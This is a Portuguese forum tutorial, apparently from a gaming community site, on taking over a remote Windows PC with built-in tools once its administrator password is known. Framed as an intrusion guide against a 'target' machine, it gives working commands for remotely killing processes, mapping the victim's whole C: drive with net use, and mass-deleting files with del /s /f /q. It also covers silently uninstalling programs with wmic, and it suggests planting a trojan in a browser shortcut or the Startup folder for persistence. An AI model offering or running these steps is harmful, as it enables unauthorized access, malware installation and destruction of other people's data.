NeverW Games

Tutorias Em Geral.


    Invadir/Hackear computador/ pelo CMD, MMC, etc..

    Compartilhe
    avatar
    C0D3R-X
    Noob
    Noob

    Mensagens : 12
    Data de inscrição : 12/01/2016

    Invadir/Hackear computador/ pelo CMD, MMC, etc..

    Mensagem por C0D3R-X em Qua Jan 13, 2016 5:13 pm

    Quando digo sem programas, é algo meio figurado, o que quero dizer realmente é que não será usado nenhum programa além dos que já vem no Windows, ou seja, CMD e tals.. (SIM, CMD é um programa '-' ) bounce



    Bom, a parte chata é que esse tutorial tem alguns requisitos



    • Ter o usuário e senha do administrador do computador remoto(isso existem várias formas de conseguir, tanto local quanto remotamente, remoto existem programas como hydra, módulos do metasploit e até mesmo um script que eu criei Source WINPWD[BETA] - Descobrir a senha do windows remotamente - Python - CaveiraTech Fórum)
    • O firewall do computador remoto deve estar inativo
    • de preferência ter o RDP/area de trabalho remota ativo no computador remoto
    • Isso se aplica a apenas quando o computador esta na mesma rede ou na DMZ de outra rede



    Por que tudo isso?

    Simples, o windows não vem com ferramentas pra hacking, isso é apenas uma adaptação das ferramentas nativas do windows e que de fato vou me limitar somente ao que vem no windows, mas pra quem quiser potencializar o ataque, sugiro dar uma olhada no sysinternals, uma suite de ferramentas da própria microsoft pra um gerenciamento mais avançado do computador, onde vc pode manipular tanto um computador local quanto remoto em questões como o que inicia com o sistema, usuários, gerenciar processos, etc..

    Pulando então os requisitos vamos la

    ~le PC atacante IP = 192.168.254.10

    ~le PC alvo IP = 192.168.254.88



    Listando e finalizando processos do computador Invadido

    Algo que pode ser útil é poder gerenciar processos do computador remoto, ou seja, listar, finalizar e criar processos, no nosso, caso podemos apenas listar e finalizar

    Pra Listar existe o comando tasklist que permite ver os processos ativos com ou sem detalhes, depende das flags que vc passar pro comando..



    no caso vou apenas usar a opção /s /u e /p que basicamente serve pra executar o tasklist no computador remoto

    * se vc informar o /s, mas não o /u e /p, quando ele se conectar, vai pedir o login e senha do mesmo jeito

    então o comando seria basicamente este



    tasklist /s /u /p


    No meu caso



    tasklist /s 192.168.254.88 /u administrador /p 12345
    [Você precisa estar registrado e conectado para ver esta imagem.]



    ou



    tasklist /s 192.168.254.88 /u administrador /p 12345
    onde a opção /v vai listar mais detalhes sobre os processos

    [Você precisa estar registrado e conectado para ver esta imagem.]



    e pra concluir vamos finalizar o processo que eu marquei em vermelho

    pra isso existe outro comando, o tasklist ele permite finalizar processos no computador local e remoto, ele funciona semelhante ao tasklist, bastando passar tasklist /s e o nome do computador alvo

    aqui vou finalizar usando o PID, então:



    taskkill /s /PID /u /p


    No meu caso



    taskkill /s 192.168.254.8 /PID 3720 /u administrador /p 12345


    e é isso ai

    [Você precisa estar registrado e conectado para ver esta imagem.]





    Acessando os arquivos do computador invadido



    Aqui a coisa começa a ficar mais interessante, pois podemos baixar/enviar/editar arquivos, pra isso vamos simplesmente fazer com que o HD dele, seja um mapeamento de rede

    Nessa parte um bom comando é o net use, como quero mapear a unidade inteira do cara, uso +$





    net use /user:




    No meu caso





    net use X: \\192.168.254.88\C$ /user:administrador 12345


    Depois disso, no computador do atacante, será criada uma unidade X que é a unidade mapeada do computador alvo





    [Você precisa estar registrado e conectado para ver esta imagem.]





    [Você precisa estar registrado e conectado para ver esta imagem.]



    Como o usuário logado é o administrador, vc tem acesso a todas as pastas e a partir daqui vc pode usar a imaginação, plantando algum outro vírus no computador do cara, como por exemplo, substituir o atalho do navegador, por um trojan e tals..



    outra coisa interessante é você por arquivos para iniciar com o sistema, pra isso basta mover o arquivo/atalho do arquivo pra pasta startup do windows, que no windows 7 é :




    C:\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup




    Deletando arquivos em massa do computador remoto



    Isso ja é mais cara de BR, invadir pra apagar tudo kk, bom aqui vc pode acessar graficamente a unidade la que vc mapeou e apagar o que quiser, mas se vc quiser, pode fazer pelo cmd tbm, usando aqueles velhos comandos de del e tals...

    No meu caso vou excluir todos os arquivos .tmp da unidade C:\ do computador invadido, que agora é a unidade X do meu PC



    * vou excluir os arquivos temporário, mas obviamente ai vc pode excluir o que quiser, ou melhor, o que seu usuário tiver permissão pra excluir



    Então aqui usei o comando





    del /s /f /q X:\*.tmp




    ou seja, excluir de forma silenciosa, recursiva e forçada todos arquivos .tmp da unidade X

    [Você precisa estar registrado e conectado para ver esta imagem.]





    Obtendo informações sobre o sistema operacional do computador



    Algo que dependendo da situação pode ser útil, é obter dados do sistema, como quando o sistema foi instalado, quais patchs de segurança estão instalados e até mesmo desde quando o computador esta ligado..

    Pra isso podemos usar o comando systeminfo



    a sintaxe lembra o tasklist, pois pasta vc passar a opção /s e o computador alvo





    systeminfo /s /u /p




    No meu caso





    systeminfo /s 192.168.254.88 /u administrador /p 12345


    #ignorem o | more no print, isso é só pra exibir a saída do comando de forma mais "calma", sem sair aquele monte de informação de uma vez, a informação vai sendo exibida conforme vc tecla enter



    [Você precisa estar registrado e conectado para ver esta imagem.]





    Listar/Remover programas instalados no computador remoto



    Aqui ja vamos começar a brincar além do CMD, usando WMI, que pode-se dizer que ele e o powershell, é a versão adulta do CMD kk



    pra começar, vamos listar os programas instalados no computador



    /user: /password: /node: product get name,version,vendor,identifyingNumber



    no caso essas opções de name, version, etc.. são mais pra detalhar as informações, se vc passar só o name, já vai retornar o nome dos programas



    No meu caso usei :



    /user:administrador /password:12345 /node:192.168.254.88 product get name,version,vendor,identifyingNumber



    [Você precisa estar registrado e conectado para ver esta imagem.]









    Então temos ai a lista de programas instalados, mas de fato, o wmic nunca me retornou a lista completa de programas instalados, alguns realmente ele não mostra, não sei porque..

    Continuando, vamos remover o java



    pra isso mudamos apenas do product pra frente..




    /user: /password: /node: product where name="" call uninstall




    No meu caso




    /user:administrador /password:12345 /node:192.168.254.88 product where name="Java 8 Update 45" call uninstall


    [Você precisa estar registrado e conectado para ver esta imagem.]





    #um detalhe, na frente do comando pra remover o programa vc pode por /nointeractive pra não exibir uma mensagem na tela (na sua tela e não na tela do computador remoto) perguntando se vc quer continuar ou não, ele remove direto



    Enfim cara, com WMI vc faz mta coisa, vc pode gerenciar varias coisas, vale a pena dar uma estudada



    aqui um help do programa




    wmic:root\cli>/?

    [global switches]

    The following global switches are available:
    /NAMESPACE Path for the namespace the alias operate against.
    /ROLE Path for the role containing the alias definitions.
    /NODE Servers the alias will operate against.
    /IMPLEVEL Client impersonation level.
    /AUTHLEVEL Client authentication level.
    /LOCALE Language id the client should use.
    /PRIVILEGES Enable or disable all privileges.
    /TRACE Outputs debugging information to stderr.
    /RECORD Logs all input commands and output.
    /INTERACTIVE Sets or resets the interactive mode.
    /FAILFAST Sets or resets the FailFast mode.
    /USER User to be used during the session.
    /PASSWORD Password to be used for session login.
    /OUTPUT Specifies the mode for output redirection.
    /APPEND Specifies the mode for output redirection.
    /AGGREGATE Sets or resets aggregate mode.
    /AUTHORITY Specifies the for the connection.
    /?[:] Usage information.

    For more information on a specific global switch, type: switch-name /?


    The following alias/es are available in the current role:
    ALIAS - Access to the aliases available on the local system
    BASEBOARD - Base board (also known as a motherboard or system board) management.
    BIOS - Basic input/output services (BIOS) management.
    BOOTCONFIG - Boot configuration management.
    CDROM - CD-ROM management.
    COMPUTERSYSTEM - Computer system management.
    CPU - CPU management.
    CSPRODUCT - Computer system product information from SMBIOS.
    DATAFILE - DataFile Management.
    DCOMAPP - DCOM Application management.
    DESKTOP - User's Desktop management.
    DESKTOPMONITOR - Desktop Monitor management.
    DEVICEMEMORYADDRESS - Device memory addresses management.
    DISKDRIVE - Physical disk drive management.
    DISKQUOTA - Disk space usage for NTFS volumes.
    DMACHANNEL - Direct memory access (DMA) channel management.
    ENVIRONMENT - System environment settings management.
    FSDIR - Filesystem directory entry management.
    GROUP - Group account management.
    IDECONTROLLER - IDE Controller management.
    IRQ - Interrupt request line (IRQ) management.
    JOB - Provides access to the jobs scheduled using the schedule service.
    LOADORDER - Management of system services that define execution dependencies.
    LOGICALDISK - Local storage device management.
    LOGON - LOGON Sessions.
    MEMCACHE - Cache memory management.
    MEMORYCHIP - Memory chip information.
    MEMPHYSICAL - Computer system's physical memory management.
    NETCLIENT - Network Client management.
    NETLOGIN - Network login information (of a particular user) management.
    NETPROTOCOL - Protocols (and their network characteristics) management.
    NETUSE - Active network connection management.
    NIC - Network Interface Controller (NIC) management.
    NICCONFIG - Network adapter management.
    NTDOMAIN - NT Domain management.
    NTEVENT - Entries in the NT Event Log.
    NTEVENTLOG - NT eventlog file management.
    ONBOARDDEVICE - Management of common adapter devices built into the motherboard (system board).
    OS - Installed Operating System/s management.
    PAGEFILE - Virtual memory file swapping management.
    PAGEFILESET - Page file settings management.
    PARTITION - Management of partitioned areas of a physical disk.
    PORT - I/O port management.
    PORTCONNECTOR - Physical connection ports management.
    PRINTER - Printer device management.
    PRINTERCONFIG - Printer device configuration management.
    PRINTJOB - Print job management.
    PROCESS - Process management.
    PRODUCT - Installation package task management.
    QFE - Quick Fix Engineering.
    QUOTASETTING - Setting information for disk quotas on a volume.
    RDACCOUNT - Remote Desktop connection permission management.
    RDNIC - Remote Desktop connection management on a specific network adapter.
    RDPERMISSIONS - Permissions to a specific Remote Desktop connection.
    RDTOGGLE - Turning Remote Desktop listener on or off remotely.
    RECOVEROS - Information that will be gathered from memory when the operating system fails.
    REGISTRY - Computer system registry management.
    SCSICONTROLLER - SCSI Controller management.
    SERVER - Server information management.
    SERVICE - Service application management.
    SHADOWCOPY - Shadow copy management.
    SHADOWSTORAGE - Shadow copy storage area management.
    SHARE - Shared resource management.
    SOFTWAREELEMENT - Management of the elements of a software product installed on a system.
    SOFTWAREFEATURE - Management of software product subsets of SoftwareElement.
    SOUNDDEV - Sound Device management.
    STARTUP - Management of commands that run automatically when users log onto the computer system.
    SYSACCOUNT - System account management.
    SYSDRIVER - Management of the system driver for a base service.
    SYSTEMENCLOSURE - Physical system enclosure management.
    SYSTEMSLOT - Management of physical connection points including ports, slots and peripherals, and proprietary connections points.
    TAPEDRIVE - Tape drive management.
    TEMPERATURE - Data management of a temperature sensor (electronic thermometer).
    TIMEZONE - Time zone data management.
    UPS - Uninterruptible power supply (UPS) management.
    USERACCOUNT - User account management.
    VOLTAGE - Voltage sensor (electronic voltmeter) data management.
    VOLUME - Local storage volume management.
    VOLUMEQUOTASETTING - Associates the disk quota setting with a specific disk volume.
    VOLUMEUSERQUOTA - Per user storage volume quota management.
    WMISET - WMI service operational parameters management.

    For more information on a specific alias, type: alias /?

    CLASS - Escapes to full WMI schema.
    PATH - Escapes to full WMI object paths.
    CONTEXT - Displays the state of all the global switches.
    QUIT/EXIT - Exits the program.

    For more information on CLASS/PATH/CONTEXT, type: (CLASS | PATH | CONTEXT) /?

    wmic:root\cli>



    e dois links bons sobre wmi

    wmi [Truques e Dicas Sobre IT]

    [Você precisa estar registrado e conectado para ver este link.]





    Enfim, não é tão pratico como alguns tipos de invasão, não tem mto point-click nessa parte, nem recursos mto avançados, mas a ideia é demonstrar que hacker não é feito de ferramentas hacker, é feito de conhecimento, conhecimento que lhe permite usar tudo a sua volta como algo que possa vir a ser útil na sua tarefa..

    em outras palavras...

    [Você precisa estar registrado e conectado para ver esta imagem.]

      Data/hora atual: Qua Jun 28, 2017 12:42 pm